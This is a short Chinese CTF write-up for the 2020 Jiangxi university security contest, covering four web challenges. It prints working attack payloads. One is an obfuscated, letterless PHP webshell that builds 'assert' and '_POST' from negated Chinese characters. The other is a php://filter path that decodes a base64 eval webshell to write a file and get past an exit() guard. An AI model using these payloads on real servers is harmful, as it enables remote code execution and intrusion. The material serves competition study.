2020年江西省大学生信息安全技术大赛Writeup
一、WEB
0x01 web1-找色差嘛
题解1-官方
题解2-江西软件职业技术大学
burpsuite 抓包直接改传参,返回包里面存有flag
0x02 web2
这道题好像是官方配置有问题,在一个容器里面有多个漏洞环境,很容易getshell,但是找不到flag,官方最后换了题
题解1-无
0x03 web3-Easy_console
题解1-官方
题解2-江西软件职业技术大学
这题试了挺多方法的
慢日志写shell 失败
写日志getshell 失败
最后在文件上传位置上传getshell
无字母一句话getshell
<?php $__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(随); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(诗); $____.=$__[$_]; $__=~(尘); $____.=$__[$_]; $__=~(欣); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);
0x04 web4-Ezexit
题解1-官方
题解2-江西软件职业技术大学
https://xz.aliyun.com/t/7457
path=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../h.php